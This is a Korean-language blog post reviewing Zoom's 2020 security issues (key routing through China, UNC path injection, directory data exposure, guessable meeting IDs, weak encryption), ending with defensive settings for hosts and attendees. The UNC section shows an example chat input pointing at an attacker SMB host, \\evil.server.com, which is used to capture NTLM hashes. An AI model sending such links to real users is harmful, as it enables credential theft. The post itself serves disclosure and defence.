Zoom 보안이슈 정리 : 당분간은 Zoom OUT

코로나19로 인한 전세계에 팬더믹 선언으로인해 재택근무 관련 서비스의 사용률도 폭발적으로 증가하고 있습니다.
특히 최근 가장 이슈가 되고 있는 화상회의서비스인 Zoom에 대한 보안이슈를 정리해보고 사용시 어떤점을 주의해야 할지에 대해 말씀드리고자 합니다.

결론부터 말씀드리자면 보안이슈가 해결되기 전 까지 당분간은 Zoom OUT !!


현재까지 알려진 Zoom 보안이슈들

최근 Zoom 화상회의서비스는 2월~3월 한달간 300% 이상의 사용자가 급증했다고 합니다.
특히 코로나19로 인해 개학/개강이 늦어지면서 Zoom을 이용한 화상수업을 준비하거나 실제 사용하고 있는 곳이 많습니다. 소프트웨어나 서비스의 사용자가 많아질수록 해커나 Seurity Researcher 들의 관심이 높아질 수 밖에 없고 실제로 최근 몇주간 Zoom관련 보안이슈가 끊임없이 나오고 있어 주의가 요구됩니다.

현재까지 알려진 Zoom 보안이슈를 하나하나 살펴봅시다.

[ 암호화 키를 중국으로 전송하는 이슈 ]

사실 이 블로그 포스팅을 작성하던 도중에 이 이슈가 나왔는데, 가장 심각해 보이는 사안이라 맨 위로 올렸습니다. 먼저 그림을 보고 설명을 드립니다.

출처 : https://citizenlab.ca/2020/04/move-fast-roll-your-own-crypto-a-quick-look-at-the-confidentiality-of-zoom-meetings/

캐나다 토론토대학 연구팀인 시티즌랩에서 발견한 이슈로, Zoom 화상회의때 사용되는 암호화 키가 베이징으로 전송되고 있다는 내용입니다. 물론 Zoom 측에서는 화상회의 폭증으로 인한 키 분배서버 부하를 줄이기 위해 보조 데이터 센터를 사용하고 있으며, 중국 서버를 경유하지 않도록 하기 위해 Geo-Fencing이라는 기술을 썼다고 하지만 실수(?)로 중국 서버를 경유하는 케이스가 발생했다는 옹색한 변명을 했습니다. [참고 링크] 

게다가 Zoom이 실리콘 밸리 기업으로 인식되어 있지만 실제로 중국내 700명의 엔지니어가 개발을 담당하고 있다고 하니, 미-중 간의 관계등을 생각할 때 이 이슈를 쉽게 넘길수는 없어 보입니다.


[ UNC Path Injection 취약점 ] –> 패치완료
https://www.bleepstatic.com/images/news/security/z/zoom/unc-injection/remote-share.png

이 취약점은 Zoom 그룹채팅창에서 URI Scheme에 대한 필터링이 제대로 구현되어 있지 않아 발생합니다.

위 그림과 같이 공격자가 Zoom 채팅창에 \\evil.server.com\images\cat.jpg 을 전송하면
Zoom에서는 이것을 클릭가능한 형태의 하이퍼링크로 표시를 하게 됩니다.

문제는 해당 링크를 클릭했을 경우 (Windows 운영체제에서) 로컬 또는 원격서버의 SMB서버에 접속을
시도하면서 발생합니다. Victim의 NTLM 해시 정보는 공격자 서버로 전송되며, 공격자는 획득한 해시를
crack 하여 Victim의 윈도우 계정을 획득할 수 있는 취약점입니다.

https://www.bleepstatic.com/images/news/security/z/zoom/unc-injection/capturing-password-hashes.png

확인결과 현재 Zoom 클라이언트 버전에서는 패치가 된 것으로 보이나, Shorten URL등을 이용한 스키마
우회가능성이 있어 주의가 필요합니다.


[ 알수 없는 익명의 사용자에게 개인정보 노출 ] –> 패치 완료

Zoom 보안이슈를 정리하면서 개인적으로 가장 황당했던 부분입니다.

Zoom의 정책상 회사 또는 특정도메인 소속 이메일로 가입을 하게 되면 자동으로 해당 도메인 사용자를
주소록에 추가됩니다. 예를들어 제가 abc@googlecorp.com 이메일로 Zoom에 가입했다면
@googlecorp 로 등록된 모든 이메일을 자동으로 “회사 연락처(Company Directory)”에 추가해주는 것입니다.

여기서 큰 문제가 발생합니다.

Zoom은 Google, Hotmail, Yahoo와 같이 이미 잘 알려진 Public 이메일 계정은 [회사 이메일]이 아니라고 판단하기 때문에 해당 이메일 도메인 사용자는 자동으로 “회사 연락처”에 추가하지 않습니다. 여기까진 문제가 없습니다.

그러나 Gmail과 같이 널리 알려지지 않은 이메일을 사용하여 Zoom에 가입하면 어떻게 될까요.

테스트 결과는 정말 황당했습니다. 

위 사진은 제가 지난달 새로 생성한 국내 O메일 로 Zoom에 가입한 후 클라이언트에 접속한 화면입니다.
Zoom은 제 이메일 계정을 회사용 메일주소로 인식하고 @OOOO.com 계정으로 Zoom에 가입한 사용자 1,000명을 자동으로 “회사 연락처”에 추가했습니다. (추가된 분들은 모두 알 수 본인이 모르는 사용자들입니다)

이 황당한 정책때문에 일면식도 없는 사람들의 이름/전화번호/이메일주소/프로필사진을 확인할 수 있었습니다. 반대로 제 개인정보 역시 같은 도메인 사용자들에게 동의없이 공개되는 문제도 있습니다.

몇가지 국내 이메일 주소로 테스트해본 결과는 다음과 같습니다.

서비스 제공자 이메일 주소 개인정보 노출 (주소록 자동추가)
Naver @naver.com 노출 안됨 (자동추가 X)
Daum @hanmail.net 노출 안됨 (자동추가 X)
 국내 A사 메일 @OOOOO.com 개인정보 노출 (자동추가 O)
 ✓ 4.4일 제보를 통해 패치 완료
국내 O기관 메일 비공개 개인정보 노출 (자동추가O)
✓ 4.4일 제보를 통해 패치 완료

제가 국내 모든 이메일 주소를 테스트 해보지는 못했지만 상당수의 도메인이 이런 문제를 갖고 있는것으로 보입니다. 문제가 있는 이메일 제공자들은 빨리 Zoom에 조치를 요구해야 할 것입니다.

개인적으로 문제를 인지하고 제보를 드렸던 OOO사 및 OOOOO 기관 분들께서 초스피드로 대응을 해주셔서 현재는 문제가 해결되었습니다. 감사합니다.


[ 추측/검색이 가능한 회의실 ID 사용 ] –> 패치 안됨

Zoom에 가입하면 다음화면과 같이 고유의 Zoom 회의룸 ID가 발급됩니다.

뒷자리 숫자는 보안상 삭제하였습니다 🙂

회의룸 ID가 숫자 10자리로만 구성되어 있다보니 당연히 Brute Force 공격에 취약합니다. 
이미 작년부터 Verge나 Hackernews와 같은 매체에서 이 이슈를 다루었는데 아직도 단순 회의 ID를 사용하고 있어 공격에 매우 취약한 상태입니다

만약 회의개설자가 비밀번호를 설정하지 않은 경우 악의적 목적을 가진 사용자가 무단으로 회의실에 들어와
포르노나 폭력적인 비디오를 투척할 수 도 있습니다. (Zoom Booming으로 이미 FBI에 수많은 제보가 들어옴)

또 한가지 문제는 Brute Force 공격뿐만 아니라 구글링을 통해 Zoom 회의룸 ID를 쉽게 찾을 수 있다는 점입니다. 이 부분은 하루 빨리 회의룸 ID를 일회용 랜덤형태로 변경해야 할 것입니다. (구글 방식) 

※내용 추가 : 4.5일부로 모든 회의실 개설시 비밀번호를 기본적용하도록 변경 되었으며, 이를 통해 익명의 사용자가 회의실ID만으로 접속하는 것을 방지할 수 있습니다. [참고 링크]


[ 그 외에 소소?하지 않은 보안 이슈들 ]

먼저 Zoom 홈페이지에서는 E2E Encryption이라고 소개를 하고 있지만 이는 사실이 아닌것으로 드러났습니다.
[관련 해외 포스팅 참고]

또한 AES도 256비트가 아닌 128비트를 사용하고 있는것으로 확인되면서 [관련 링크] Zoom의 보안성에 대한
신뢰도는 날이 갈수록 낮아지는 듯 합니다. (거기다 암호화 모드를 ECB 로???)


[ 그래서 어떻게 해야할까? ]

코로나 19로 인해 재택근무, 화상회의/수업이 늘어나면서 Zoom 사용은 계속해서 늘어날것으로 전망됩니다.
그러나 현재까지 발견된 보안취약점과 이슈등을 고려할 때 Zoom을 사용하는 것은 좋은 선택이 아닙니다.

실제로  엘런 머스크가 이끌고 있는 SpaceX는 사내에서 Zoom 사용을 금지하였습니다 [관련 링크]

따라서 보안적인 이슈가 해결될 때 까지는 Google의 Meet 이나 사내망 전용 화상회의 서비스를 사용하기를
권장합니다.

만약 어쩔 수 없이 Zoom을 사용해야 한다면 아래와 같이 보안설정 후 사용하시기 바랍니다.

  • 회의 개설시 보안 권고 사항
    • Zoom 화상회의 개설 시 반드시 비밀번호 를 설정해야 합니다.
    • 화상회의 전 [대기실 사용] 옵션을 통해 화상회의 참석자에 대한 확인 절차를 거치도록 합니다.
    • 화상회의룸 ID를 타인에게 공유하거나 SNS 등에 업로드 하지 않습니다.
    • 화면 공유 (고급 옵션)을 “호스트 전용”으로 설정합니다.

 

  • 회의 참석자 보안 권고 사항
    • 회의 참석 전 제3의 커뮤니케이션 채널을 통해 회의실 정보를 확인 후 입장합니다.
    • 익명의 사용자가 전달한 Zoom관련 회의에 참석하지 않습니다.
    • Zoom 소프트웨어를 최신상태로 유지하기 위해 노력합니다. (업데이트)

 

 

Site Footer